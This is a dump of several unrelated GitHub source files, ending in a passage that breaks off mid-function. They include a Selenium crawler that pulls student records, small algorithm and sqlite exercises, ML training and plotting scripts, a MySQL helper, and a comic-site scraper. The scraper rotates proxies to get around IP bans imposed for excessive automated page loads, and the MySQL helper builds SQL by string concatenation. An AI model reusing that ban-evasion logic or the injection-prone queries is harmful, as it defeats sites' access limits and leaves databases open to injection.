button\n self.browser.find_element_by_id(\"contextMenu\").click()\n\n if view.lower() == \"school\":\n self.browser.find_element_by_id(\"contextSchool\").click()\n\n elif view.lower() == \"health\":\n self.browser.find_element_by_id(\"contextHealth\").click()\n\n elif view.lower() 
== \"staff\":\n self.browser.find_element_by_id(\"contextStaff\").click()\n else:\n raise Exception(\"Incorrect Selection: must choose 'school', 'health', or 'staff', view\")\n\n def select_school(self, school):\n \"\"\"\n\n :param school: this parameter takes one of four strings - \"ACADEMY\", \"ASCEND\", \"BLOOM\" or \"ONE\"\n :return: wll navigate to that school page\n \"\"\"\n window_before = self.browser.window_handles[0]\n\n self.browser.find_element_by_xpath(\n '//*[@id=\"header\"]/table[1]/tbody/tr/td[3]/div/table/tbody/tr/td[2]/div/a').click()\n\n window_after = self.browser.window_handles[1]\n self.browser.switch_to.window(window_after)\n\n time.sleep(2)\n\n if school.lower() == \"academy\":\n self.browser.find_element_by_id(\"skl01000000769\").click()\n\n elif school.lower() == \"ascend\":\n self.browser.find_element_by_id(\"skl01000000088\").click()\n\n elif school.lower() == \"bloom\":\n self.browser.find_element_by_id(\"skl01000000817\").click()\n elif school.lower() == \"one\":\n self.browser.find_element_by_id(\"skl01000000853\").click()\n else:\n raise Exception(\"Incorrect Selection: must choose academy, ascend, bloom, or one\")\n\n self.browser.find_element_by_id(\"okButton\").click()\n\n self.browser.switch_to.window(window_before)\n\n def select_tab(self, top_tab_selection):\n \"\"\"\n\n :param top_page_tab: (str) can choose one of the top tabs in the school view.\n :return: Navigates to a tab within school view\n \"\"\"\n time.sleep(2)\n\n self.browser.find_element_by_id(\"topTabs\")\n self.browser.find_element_by_link_text(top_tab_selection.capitalize()).click()\n\n time.sleep(2)\n\n def select_filter(self, student_group):\n \"\"\"\n :student_group: (str) filter selection (either \"active\" which is \"All Active Students\" or \"former\" which is \"Former Students\"\n :return:\n \"\"\"\n\n # choose either active or former students\n self.browser.find_element_by_id(\"filterMenu\").click()\n\n time.sleep(1)\n\n if student_group.lower() == \"active\":\n self.browser.find_element_by_xpath('//*[@id=\"filterMenu_Option1\"]/td[2]').click()\n elif student_group.lower() == \"former\":\n self.browser.find_element_by_xpath('//*[@id=\"filterMenu_Option7\"]/td[2]').click()\n else:\n raise Exception(\"Not a valid selection\")\n\n\nclass StudentIdentifyingInfo(AspenWebcrawlerCPS):\n\n def __init__(self):\n AspenWebcrawlerCPS.__init__(self)\n\n def build_quick_report_students_tab(self, selection_list):\n \"\"\"\n\n :selection_list: (list) list of report parameters you would like to choose\n :return:\n \"\"\"\n\n # click report menu\n self.browser.find_element_by_xpath('//*[@id=\"reportsMenu\"]').click()\n\n # switch windows (quick report opens up new window)\n window_before = self.browser.window_handles[0]\n\n # select \"quick report\"\n self.browser.find_element_by_xpath(\n '/html/body/form/table/tbody/tr[2]/td/div/table[2]/tbody/tr[1]/td[2]/table[1]/tbody/tr/td[2]/div[2]/table[1]/tbody/tr[24]/td[2]').click()\n window_after = self.browser.window_handles[1]\n self.browser.switch_to.window(window_after)\n\n # click next button twice\n self.browser.find_element_by_id(\"wizNextButton\").click()\n self.browser.find_element_by_id(\"wizNextButton\").click()\n\n # Remove all fields that are already in selected field.\n select = Selector(text=self.browser.page_source)\n selected_fields = select.xpath('//*[@id=\"selectedFieldIds\"]/option//text()').extract()\n\n # collect list of all fields in \"Selected Fields\"\n selected_fields_converted = []\n for element in selected_fields:\n 
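# The extracted option labels keep surrounding whitespace, so strip each\n            # one before it is matched against the select widget's visible text.\n            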
selected_fields_converted.append(element.strip())\n\n select = Select(self.browser.find_element_by_xpath('//*[@id=\"selectedFieldIds\"]'))\n\n # Remove element from list that you would like to leave in selected field\n # NOTE: This is done because 'School > Name' does not appear in available field if removed\n selected_fields_converted.remove('School > Name')\n\n for element in selected_fields_converted:\n select.select_by_visible_text(element)\n\n self.browser.find_element_by_id(\"removeButton\").click()\n\n # Choose elements and add to selected field\n select = Select(self.browser.find_element_by_xpath('//*[@id=\"availableFieldIds\"]'))\n\n for selection in selection_list:\n select.select_by_visible_text(selection)\n\n self.browser.find_element_by_id(\"addButton\").click()\n\n # Hit next button three times\n self.browser.find_element_by_id(\"wizNextButton\").click()\n self.browser.find_element_by_id(\"wizNextButton\").click()\n self.browser.find_element_by_id(\"wizNextButton\").click()\n\n # Click the finish button and switch to new popup window\n self.browser.find_element_by_id(\"finishButton\").click()\n window_final = self.browser.window_handles[1]\n self.browser.switch_to.window(window_final)\n\n # find table and save to html\n self.browser.find_element_by_xpath('/html/body/table')\n content = self.browser.page_source\n\n # read in html table to pd.dataframe\n custom_report = pd.read_html(content, flavor='html5lib', header=0)[0]\n\n return custom_report\n\n\nclass StudentAttendance(AspenWebcrawlerCPS):\n\n def __init__(self):\n AspenWebcrawlerCPS.__init__(self)\n\n def _cleanAttendance(self, attendance_file):\n \"\"\"\n\n :param attendance_file:\n :return:\n \"\"\"\n\n # Drop empty rows\n attendance_file.dropna(subset=['Student.1'], inplace=True)\n\n # Chose subset of columns to keep\n attendance_file = attendance_file[\n ['Student', 'Grade', 'Homeroom', 'Member', 'Present', 'Absent', 'Tardy', 'Dismiss']]\n\n # filter out renments of excel pagination\n attendance_file = attendance_file.loc[attendance_file['Student'] != \"CHARTER\"]\n attendance_file = attendance_file.loc[attendance_file['Student'] != \"Student\"]\n attendance_file = attendance_file.loc[~attendance_file['Student'].str.contains(\"Page [0-9]\", regex=True)]\n\n return (attendance_file)\n\n def pull_attendance_report(self):\n \"\"\"\n\n :return:\n \"\"\"\n\n # click report menu\n self.browser.find_element_by_xpath('//*[@id=\"reportsMenu\"]').click()\n\n # switch windows (quick report opens up new window)\n window_before = self.browser.window_handles[0]\n\n # click Student Membership under report menu\n self.browser.find_element_by_xpath('//*[@id=\"reportsMenu_Option11\"]/td[2]').click()\n window_after = self.browser.window_handles[1]\n self.browser.switch_to.window(window_after)\n\n # Format: Select CSV\n self.browser.find_element_by_id('format').click()\n self.browser.find_element_by_xpath('//*[@id=\"format\"]/option[2]').click()\n\n # Students to include: Select all students\n # self.browser.find_element_by_xpath('// *[ @ id = \"tab_0\"] / td[2] / select').click()\n # self.browser.find_element_by_xpath('//*[@id=\"tab_0\"]/td[2]/select/option[2]').click()\n\n\n # click run\n self.browser.find_element_by_xpath(\n '/html/body/table/tbody/tr[2]/td/form/table/tbody/tr[5]/td/button[1]').click()\n\n window_final = self.browser.window_handles[1]\n self.browser.switch_to.window(window_final)\n\n time.sleep(3)\n\n content = self.browser.page_source\n\n # read in html table to pd.dataframe\n custom_report = 
pd.read_html(content,\n flavor='html5lib',\n header=13)[0]\n\n custom_report_clean = self._cleanAttendance(custom_report)\n\n return (custom_report_clean)\n","repo_name":"kippchicago/aspen_webcrawler","sub_path":"aspen_webcrawler/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35587711892","text":"import random\nimport time\nINVERSION = 0\n\n\ndef random_int_list(start, stop, length):\n start, stop = (int(start), int(stop)) if start <= stop else (\n int(stop), int(start))\n length = int(abs(length)) if length else 0\n random_list = []\n for i in range(length):\n random_list.append(random.randint(start, stop))\n return random_list\n\n\ndef INVERSION_NUM(list):\n n = 0\n for i in range(0, len(list)):\n for j in range(i, len(list)):\n if i < j and list[i] > list[j]:\n n += 1\n return n\n\n\ndef MERGE(list, p, q, r):\n global INVERSION\n L = list[p:q]\n R = list[q:r]\n i = j = 0\n while i < len(L) and j < len(R):\n if L[i] <= R[j]:\n list[p] = L[i]\n i += 1\n else:\n list[p] = R[j]\n INVERSION += q + j - p\n j += 1\n p += 1\n if i > j:\n for j in range(j, len(R)):\n list[p] = R[j]\n p += 1\n else:\n for i in range(i, len(L)):\n list[p] = L[i]\n p += 1\n\n\ndef MERGE_SORT(list, p, r):\n if p < r - 1:\n q = int((r - p) / 2 + p)\n MERGE_SORT(list, p, q)\n MERGE_SORT(list, q, r)\n MERGE(list, p, q, r)\n return INVERSION\n\nA = random_int_list(1, 10000, 100)\nB = A[:]\nstart = time.clock()\nprint(MERGE_SORT(B, 0, len(B)))\nend = time.clock()\nprint(\"MERGE: %f s\" % (end - start))\n\nB = A[:]\nstart = time.clock()\nprint(INVERSION_NUM(B))\nend = time.clock()\nprint(\"INVERSION: %f s\" % (end - start))\n","repo_name":"mixterjim/Learn","sub_path":"Python/CLRS/2-4_Inversion.py","file_name":"2-4_Inversion.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26768210741","text":"import sqlite3\n\ncon = sqlite3.connect('pcfb.sqlite')\n\n## Creating the tables\n##con.execute(\"create table people (id integer primary key, name varchar, position varchar, phone varchar, office varchar);\")\n##con.execute(\"create table experiment ( id integer primary key, name varchar, researcher integer, description text, foreign key(researcher) references people(id))\")\n\ncon.execute('insert into people values (0, \\'Alice\\', \\'Research Director\\', 555-123-0001, \\'4b\\')')\ncon.execute('insert into people values (1, \\'Bob\\', \\'Research assistant\\', 555-123-0002, \\'17\\')')\ncon.execute('insert into people values (2, \\'Charles\\', \\'Research assistant\\', 555-123-0001, \\'24\\')')\ncon.execute('insert into people values (3, \\'David\\', \\'Research assistant\\', 555-123-0001, \\'8\\')')\ncon.execute('insert into people values (4, \\'Edwards\\', \\'Toadie\\', \\'None\\', \\'Basement\\')')\n\ncon.execute('insert into experiment values (0, \\'EBV Vaccine trial\\', 0, \\'A vaccine trial\\')')\ncon.execute('insert into experiment values (1, \\'Flu antibody study\\', 2, \\'Study of the morphology of flu antibodies\\')')\n\nr = con.execute('select * from people')\n\nfor i in r:\n print(i)\n\nr = con.execute('select p.name, e.name from people as p join experiment as e where e.researcher == p.id')\n\nfor i in r:\n print('Name: %s\\n\\tExperiment: %s' % (i[0],i[1]))\n\n## Write a script to add a new user and experiment to the database;\n## To add a new user:\ncon.execute('insert into 
people values (5, \\'New User\\', \\'New User\\', \\'New User\\', \\'New User\\')')\n\n## To add a new experiment:\ncon.execute('insert into experiment values (2, \\'New Experiment\\', 2, \\'New Experiment\\')')\n\n## Reassign her experiments to the new user\n## Take the experiments that were Alices and set it to a new user\ncon.execute('UPDATE experiment SET researcher = 5 WHERE id = 2;')\n\n## Remove Alice\ncon.execute('delete from people where name=\\'Alice\\'');\nprint('After deleting Alice')\n\nr = con.execute('select * from people')\n\nfor i in r:\n print(i)\n\n## Print out all of the experiment names with who owns each experiment.\nr = con.execute('select p.name, e.name from people as p join experiment as e where e.researcher == p.id')\n\nprint('Printing out experiments after deleting Alice: ')\nfor i in r:\n print('Name: %s\\n\\tExperiment: %s' % (i[0],i[1]))","repo_name":"sfidahussain/aliceIsGone","sub_path":"aliceIsGone.py","file_name":"aliceIsGone.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34427044240","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 15 17:44:20 2023\r\n\r\n@author: Jenyi\r\n\r\nFunctions for plotting UMAP and TSNEs\r\n\"\"\"\r\n\r\nimport os\r\nimport umap.umap_ as umap\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport matplotlib.colors as mcolors\r\n\r\ndef plot_umap(data, \r\n\t\t\t labels, \r\n\t\t\t title_list,\r\n\t\t\t save_path:str='./'):\r\n\t\r\n \"\"\"\r\n\tFor plotting UMAP.\r\n\tParameters:\r\n\t\tdata: data matrix of (# samples, # genes)\r\n\t\tlabels: cell label matrix of (# samples) containing cluster labels of each cell\r\n\t\ttitle_list: list with title for each plot\r\n\t\tsave_path: str path to save the UMAP to\r\n\t\t\r\n\tReturns:\r\n\t\tNone\r\n\t\r\n \"\"\"\r\n\r\n trans = umap.UMAP(n_neighbors=5, random_state=42).fit(data)\r\n color_list = list(mcolors.CSS4_COLORS.keys())\r\n\t\r\n fig, ax = plt.subplots(1, len(labels), figsize=(10,5))\r\n for i, l_arr in enumerate(labels):\r\n num_clusters = np.unique(l_arr)\r\n temp = zip(num_clusters, num_clusters)\r\n annotation_map = {k:v for k, v in temp} \t\t\r\n for n in num_clusters:\r\n temp_trans = trans.embedding_[np.where(l_arr == n)[0], :]\r\n ax[i].scatter(temp_trans[:, 0], temp_trans[:, 1], s= 5, color=color_list[int(n)], label=annotation_map[n])\r\n ax[i].axis('off')\r\n ax[i].set_title(title_list[i])\r\n\t\t\t\r\n plt.legend(bbox_to_anchor=(1.2, 1.00))\r\n\r\n plt.suptitle('UMAP of cell type clustering', fontsize=16) \r\n plt.savefig(os.path.join(save_path, 'umap.jpg'), dpi=60)\r\n\t\r\n return\r\n\r\n","repo_name":"jenyiw/MTG-SC-Clustering","sub_path":"scripts/plotumapFunctions.py","file_name":"plotumapFunctions.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24620616954","text":"## Burst Image Restoration and Enhancement\n## Akshay Dudhane, Syed Waqas Zamir, Salman Khan, Fahad Shahbaz Khan, and Ming-Hsuan Yang\n## https://arxiv.org/abs/2110.03680\n\nimport os\n\n######################################## Pytorch lightning ########################################################\n\nfrom pytorch_lightning.callbacks import ModelCheckpoint\nfrom pytorch_lightning import Trainer, seed_everything\nseed_everything(13)\n\n######################################## Model and Dataset ########################################################\n\nfrom 
Network import BIPNet\nfrom datasets.zurich_raw2rgb_dataset import ZurichRAW2RGB\nfrom datasets.synthetic_burst_train_set import SyntheticBurst\nfrom torch.utils.data.dataloader import DataLoader\n\n##################################################################################################################\n\nlog_dir = './logs/Track_1/'\n\nclass Args:\n def __init__(self):\n self.image_dir = \"./Zurich-RAW-to-DSLR-Dataset\"\n self.model_dir = log_dir + \"saved_model\"\n self.result_dir = log_dir + \"results\"\n self.batch_size = 1\n self.num_epochs = 100\n self.lr = 1e-4\n self.burst_size = 14\n self.NUM_WORKERS = 6\n \nargs = Args()\n\n######################################### Data loader ######################################################\n\ndef load_data(image_dir, burst_size):\n\n train_zurich_raw2rgb = ZurichRAW2RGB(root=image_dir, split='train')\n train_dataset = SyntheticBurst(train_zurich_raw2rgb, burst_size=burst_size, crop_sz=384) \n train_loader = DataLoader(train_dataset, batch_size=1, shuffle=True, drop_last=True, num_workers=args.NUM_WORKERS, pin_memory=True)\n\n test_zurich_raw2rgb = ZurichRAW2RGB(root=image_dir, split='test')\n test_dataset = SyntheticBurst(test_zurich_raw2rgb, burst_size=burst_size, crop_sz=384) \n test_loader = DataLoader(test_dataset, batch_size=1, num_workers=args.NUM_WORKERS, pin_memory=True)\n\n return train_loader, test_loader\n\n######################################### Load BIPNet ####################################################\n\nmodel = BIPNet()\nmodel.cuda()\nmodel.summarize()\n\nif not os.path.exists(args.model_dir):\n os.makedirs(args.model_dir, exist_ok=True) \n\n######################################### Training #######################################################\n\ntrain_loader, test_loader = load_data(args.image_dir, args.burst_size)\n\ncheckpoint_callback = ModelCheckpoint(\n monitor='val_psnr',\n dirpath=args.model_dir,\n filename='{epoch:02d}-{val_psnr:.2f}',\n save_top_k=3,\n save_last=True,\n mode='max',\n)\n\ntrainer = Trainer(gpus=-1,\n auto_select_gpus=True,\n accelerator='ddp',\n max_epochs=300,\n precision=16,\n gradient_clip_val=0.01,\n callbacks=[checkpoint_callback],\n benchmark=True,\n deterministic=True,\n val_check_interval=0.25,\n progress_bar_refresh_rate=100,\n profiler=\"advanced\")#,\n #resume_from_checkpoint = args.model_dir + './BIPNet.ckpt')\n\ntrainer.fit(model, train_loader, test_loader)\n","repo_name":"akshaydudhane16/BIPNet","sub_path":"Burst_Super_Resolution/BIPNet_Track_1_training.py","file_name":"BIPNet_Track_1_training.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","stars":116,"dataset":"github-code","pt":"72"} +{"seq_id":"27224405054","text":"################################################################################\n\"\"\"\n@Time : 2020/12/19\n@File : db_client.py\n@Author : cenquanyu@baidu.com\n\"\"\"\nimport logging\nimport pymysql\nimport log\n\n\nclass DbClient(object):\n \"\"\"DB operations helper class\n \"\"\"\n def __init__(self, user, passwd):\n self.dbname = 'dbname'\n self.dbhost = 'xx.xx.xxx.xx'\n self.db = pymysql.connect(host=self.dbhost, user=user, password=passwd, database=self.dbname, charset='utf8')\n self.cursor = self.db.cursor()\n\n def execute_sql(self, sql):\n \"\"\"Execute a SQL statement on the DB connection\"\"\"\n self.cursor.execute(sql)\n\n def execute_sql_fetchall(self, sql):\n \"\"\"Execute a SQL statement on the DB connection and return all results\"\"\"\n self.cursor.execute(sql)\n return self.cursor.fetchall()\n\n def execute_sql_fetchall_dictlist(self, sql):\n \"\"\"Execute a SQL statement on the DB connection and return a dictlist\"\"\"\n with 
self.db.cursor(cursor=pymysql.cursors.DictCursor) as cursor:\n cursor.execute(sql)\n return cursor.fetchall()\n\n def insert_all(self, table, *args, **kwargs):\n \"\"\"Insert data\"\"\"\n data_dict = kwargs\n length = 0\n ksql, vsql = '', ''\n # values are concatenated verbatim, so each must already be a valid SQL literal\n for k, v in data_dict.items():\n if length == 0:\n ksql = \"INSERT INTO \" + table + \"(\" + k\n vsql = \"VALUES (\" + v\n else:\n ksql += ',' + k\n vsql += ',' + v\n length += 1\n ksql += \")\"\n vsql += \")\"\n sql = ksql + vsql\n try:\n self.db.ping(reconnect=True)\n self.execute_sql(sql)\n self.db.commit()\n logging.info('Insert data \\n')\n logging.info(data_dict)\n logging.info('---- Data Insert success ----')\n except Exception as e:\n logging.error(e)\n self.db.rollback()\n self.db.close()\n\n def insert(self, sql):\n \"\"\"Insert data (using raw SQL)\"\"\"\n try:\n self.db.ping(reconnect=True)\n self.execute_sql(sql)\n self.db.commit()\n except Exception as e:\n logging.error(e)\n self.db.rollback()\n self.db.close()\n\n def update(self, sql):\n \"\"\"Update data (using raw SQL)\"\"\"\n try:\n self.db.ping(reconnect=True)\n self.execute_sql(sql)\n self.db.commit()\n except Exception as e:\n logging.error(e)\n self.db.rollback()\n self.db.close()\n\n def query_all(self, sql):\n \"\"\"Query data (returns a tuple of rows)\"\"\"\n squery = ''\n try:\n self.db.ping(reconnect=True)\n squery = self.execute_sql_fetchall(sql)\n except Exception as e:\n logging.error(e)\n self.db.close()\n\n return squery\n\n def query_dictlist(self, sql):\n \"\"\"Query data (returns a list of dicts)\"\"\"\n squery = ''\n try:\n self.db.ping(reconnect=True)\n squery = self.execute_sql_fetchall_dictlist(sql)\n except Exception as e:\n logging.error(e)\n self.db.close()\n\n return squery","repo_name":"7Bcoding/unreachable_host_monitor","sub_path":"db_client.py","file_name":"db_client.py","file_ext":"py","file_size_in_byte":3127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70444781993","text":"# encoding:UTF-8\nimport json\nimport os\nimport platform\nimport sys\nimport time\nfrom Queue import Queue\nfrom threading import Thread\nfrom time import sleep\n\nimport requests\n# 首先获取漫画的基本信息\nfrom pyquery import PyQuery as pq\nfrom requests.exceptions import ConnectionError, ReadTimeout, TooManyRedirects, RequestException\n\nimport init_proxy\nimport read_comic_to_db\n\nproxy_list = []\nurl = \"http://lofi.e-hentai.org\"\nheaders = {\n 'cache-control': \"no-cache\",\n 'postman-token': \"5bd3dab9-6df8-e0b8-a2e7-a714c104c74b\",\n 'cookie': 'xres=3'\n}\nindex = 0\n\n\ndef now():\n return time.strftime(\"[%Y-%m-%d %H:%M:%S]\", time.localtime(int(time.time())))\n\n\ndef init(proxy, page=1, max_page=20, use_proxy=True, dir_name=None):\n global index, proxy_list\n if dir_name is None:\n # 首先创建一个基于当前时间的文件夹\n dir_name = time.strftime(\"%Y-%m-%d %H%M%S\", time.localtime(int(time.time())))\n # 在Windows环境下 文件夹不允许带冒号\n if platform.system() == \"Windows\":\n dir_name = time.strftime(\"%Y-%m-%d %H%M%S\", time.localtime(int(time.time())))\n dir_name = \"data-\" + dir_name\n os.mkdir(dir_name)\n proxies = {\n \"http\": proxy,\n }\n while page < max_page:\n querystring = {\n \"page\": page,\n \"f_apply\": \"Search\",\n \"f_search\": \"Chinese\"\n }\n response = None\n while response is None:\n try:\n if use_proxy:\n response = requests.request(\"GET\", url, headers=headers, params=querystring, proxies=proxies,\n timeout=10)\n else:\n response = requests.request(\"GET\", url, headers=headers, params=querystring, timeout=10)\n if response.text.count('squid') > 0 or response.text.count(\"http://warning.or.kr\") > 0:\n 
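# a 'squid' marker or a redirect to warning.or.kr means this proxy is blocked or filtered,\n # so raise ConnectionError and let the except handler below rotate to the next proxy\n 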
print(now() + \"当前代理出现异常,切换代理\")\n raise ConnectionError(\"has been blocked\")\n if response.status_code != 200:\n print(now() + \"非正常返回结果,代码[\" + str(response.status_code) + \"],切换代理\")\n raise ConnectionError(\"has been blocked\")\n if response.text.count(\n 'Your IP address has been temporarily banned for excessive pageloads which indicates that you are using automated mirroring/harvesting software.') > 0:\n print(now() + \"当前代理已被Ban,切换代理\")\n raise ConnectionError(\"has been blocked\")\n print(now() + \"入侵成功!当前为第\" + str(page) + \"页\")\n except ConnectionError:\n # 如果代理连不上,换一个\n index += 1\n if index == len(proxy_list):\n index = 0\n init_proxy.create_proxy()\n print(now() + \"重新获取代理成功\")\n with open('proxy.json', 'r') as f:\n proxy_list = json.loads(f.read(-1))\n print(\n now() + \"代理[\" + proxies.get('http') + \"]不可用,切换至[\" + proxy_list[index] + \"],当前为第\" + str(page) + \"页\")\n proxies = {\n \"http\": proxy_list[index]\n }\n continue\n except ReadTimeout:\n # 如果代理连不上,换一个\n index += 1\n if index == len(proxy_list):\n index = 0\n init_proxy.create_proxy()\n print(now() + \"重新获取代理成功\")\n with open('proxy.json', 'r') as f:\n proxy_list = json.loads(f.read(-1))\n print(now() + \"代理[\" + proxies.get('http') + \"]超时,切换至[\" + proxy_list[index] + \"],当前为第\" + str(page) + \"页\")\n proxies = {\n \"http\": proxy_list[index]\n }\n continue\n # 获得漫画栏,对漫画栏的每个元素进行迭代 div id = ig\n comic_list = pq(response.text).find('.ig')\n comic_json_list = []\n list_len = 0\n for elements in comic_list:\n comic = read_basic_comic_info(elements)\n # 获取完成基本信息之后,就要遍历漫画的每张图片了\n # imgList = read_basic_comic_info()\n # comic[\"imgList\"] = json.dumps(imgList)\n comic_json_list.append(comic)\n list_len += 1\n print(now() + \"读取漫画信息中[\" + json.dumps(comic) + \"]\")\n\n comic_json_list = json.dumps(comic_json_list)\n print(now() + \"读取了 \" + str(list_len) + \" 个漫画 , 准备写入\")\n if list_len == 0:\n print(now() + \"读取漫画失败,重新读取\")\n continue\n # 最后将当前页的数据写回json\n with open(dir_name + \"/\" + str(page) + \".json\", 'w') as f:\n f.write(comic_json_list)\n page += 1\n print(now() + \"数据写入成功,等待睡眠2秒后进行下一页查询\")\n time.sleep(2)\n return dir_name\n\n\n# 生成一个Comic对象\ndef read_basic_comic_info(element):\n # 链接\n comic_link = pq(element).find(\"a\").eq(0).attr(\"href\")\n # 漫画ID\n comic_id = comic_link.split('/')[5]\n # 漫画标题\n comic_title = pq(element).find(\"a\").eq(1).text()\n # 漫画时间\n comic_date = pq(element).find('td .ik').eq(0).next().text().split(\"by\")[0]\n # 漫画分类\n comic_category = pq(element).find('td .ik').eq(1).next().text()\n # 漫画标签\n comic_tag = pq(element).find('td .ik').eq(2).next().text()\n # 漫画评分\n comic_rank = str(pq(element).find('td .ik').eq(3).next().text().count(\"*\"))\n # 漫画封面\n comic_cover = pq(element).find(\"a\").eq(0).children().attr(\"src\")\n\n dict = {\"comicLink\": comic_link, \"comicId\": comic_id, \"comicTitle\": comic_title, \"comicDate\": comic_date,\n \"comicCategory\": comic_category, \"comicTag\": comic_tag, \"comicRank\": comic_rank, \"comicCover\": comic_cover,\n \"imgList\": []}\n\n return dict\n\n\ndef read_comic_img_info(comic_link, headers, proxy, use_proxy=True):\n if not os.path.exists('ComicData') or not os.path.isdir('ComicData'):\n os.mkdir('ComicData')\n global index, proxy_list\n if len(proxy_list) == 0:\n print(now() + '代理列表为空,重新获取')\n init_proxy.create_proxy()\n print(now() + \"获取代理成功\")\n with open('proxy.json', 'r') as f:\n proxy_list = json.loads(f.read(-1))\n comic_id = comic_link.split('/')[5]\n if os.path.exists('ComicData/' + comic_id + \".json\"):\n print(now() + \"漫画[\" + 
comic_id + \"]的数据已存在\")\n return\n print(now() + \"正在读取漫画[\" + comic_id + \"]的数据\")\n this_page_link = comic_link\n prev_page_link = ''\n proxy = {\n \"http\": proxy\n }\n page = 0\n img_list = []\n total_page = 999\n # 当上一页和当前页相同时,说明完结了,退出\n while this_page_link != prev_page_link:\n if this_page_link is None:\n break\n try:\n if use_proxy:\n response = requests.request(\"GET\", this_page_link, headers=headers, proxies=proxy, timeout=10)\n else:\n response = requests.request(\"GET\", this_page_link, headers=headers, timeout=10)\n # 代理出了问题\n if response.text.count('squid') or response.text.count(\"http://warning.or.kr\") > 0:\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"当前代理出现异常,切换代理\")\n raise ConnectionError(\"has been blocked\")\n if response.status_code != 200:\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"非正常返回结果,代码[\" + str(response.status_code) + \"],切换代理\")\n raise ConnectionError(\"has been blocked\")\n # print(now()+response.text)\n if page == 0:\n # 目录页 提取第一页的链接\n tmp = pq(response.text).find('.gi').eq(0).find('a').attr('href')\n if tmp is None:\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"读取数据错误,重新读取,切换代理\")\n raise ConnectionError(\"has been blocked\")\n if tmp.count(\"509.gif\") > 0:\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"当前代理已被Ban,重新读取,切换代理\")\n raise ConnectionError(\"has been blocked\")\n prev_page_link = this_page_link\n this_page_link = tmp\n page += 1\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"目录页读取完成,开始进入第一页\")\n else:\n # 图片页 提取下一页的链接\n img_link = pq(response.text)(\"#sm\").attr('src')\n # 图片页链接非法\n if img_link is None:\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"读取数据错误,重新读取,切换代理\")\n raise ConnectionError(\"has been blocked\")\n if img_link.count(\"509.gif\") > 0:\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"当前代理已被Ban,重新读取,切换代理\")\n raise ConnectionError(\"has been blocked\")\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"第\" + str(page) + \"页数据为[\" + img_link + \"]\")\n # 下载中\n download_count = 0\n result = download_img(img_link, comic_id)\n while download_count < 5 and not result:\n download_count += 1\n print(\n now() + \"读取漫画[\" + comic_id + \"]:\" + \"图片下载失败[\" + img_link + \"],重试第\" + str(download_count) + \"次中\")\n result = download_img(img_link, comic_id)\n if download_count >= 5 and not result:\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"下载图片失败,重新读取,切换代理\")\n raise ConnectionError(\"has been blocked\")\n # 下载完成\n img_list.append(img_link)\n td = pq(response.text)('#ia').children().eq(0).children().children()\n total_page = int(td.eq(1).text().split('/')[1])\n tmp = td.eq(2).children().attr('href')\n prev_page_link = this_page_link\n this_page_link = tmp\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"第\" + str(page) + \"页读取完成,总共有\" + str(total_page) + \"页\")\n if total_page == page:\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"当前漫画已读取完毕\")\n break\n if this_page_link is None:\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"读取下一页出现错误\")\n raise ConnectionError(\"has been blocked\")\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"下一页为[\" + this_page_link + \"]\")\n page += 1\n except ConnectionError:\n # 如果代理连不上,换一个\n index += 1\n if index == len(proxy_list):\n index = 0\n init_proxy.create_proxy()\n print(now() + \"重新获取代理成功\")\n with open('proxy.json', 'r') as f:\n proxy_list = json.loads(f.read(-1))\n if index >= len(proxy_list):\n index = 0\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"代理[\" + proxy.get('http') + \"]不可用,切换至[\" + proxy_list[index] +\n \"],当前为\" + (\"目录\" if page == 0 else 
\"第\" + str(page)) + \"页\")\n proxy = {\n \"http\": proxy_list[index]\n }\n continue\n except TooManyRedirects:\n # 如果代理连不上,换一个\n index += 1\n if index == len(proxy_list):\n index = 0\n init_proxy.create_proxy()\n print(now() + \"重新获取代理成功\")\n with open('proxy.json', 'r') as f:\n proxy_list = json.loads(f.read(-1))\n if index >= len(proxy_list):\n index = len(proxy_list) - 1\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"代理[\" + proxy.get('http') + \"]链接不可用,切换至[\" + proxy_list[index] +\n \"],当前为\" + (\"目录\" if page == 0 else \"第\" + str(page)) + \"页\")\n proxy = {\n \"http\": proxy_list[index]\n }\n continue\n except ReadTimeout:\n # 如果代理连不上,换一个\n index += 1\n if index == len(proxy_list):\n index = 0\n init_proxy.create_proxy()\n print(now() + \"重新获取代理成功\")\n with open('proxy.json', 'r') as f:\n proxy_list = json.loads(f.read(-1))\n if index >= len(proxy_list):\n index = len(proxy_list) - 1\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"代理[\" + proxy.get('http') + \"]超时,切换至[\" + proxy_list[index] +\n \"],当前为\" + (\"目录\" if page == 0 else \"第\" + str(page)) + \"页\")\n proxy = {\n \"http\": proxy_list[index]\n }\n continue\n except RequestException as e:\n # 如果代理连不上,换一个\n index += 1\n if index == len(proxy_list):\n index = 0\n init_proxy.create_proxy()\n print(now() + \"重新获取代理成功\")\n with open('proxy.json', 'r') as f:\n proxy_list = json.loads(f.read(-1))\n if index >= len(proxy_list):\n index = len(proxy_list) - 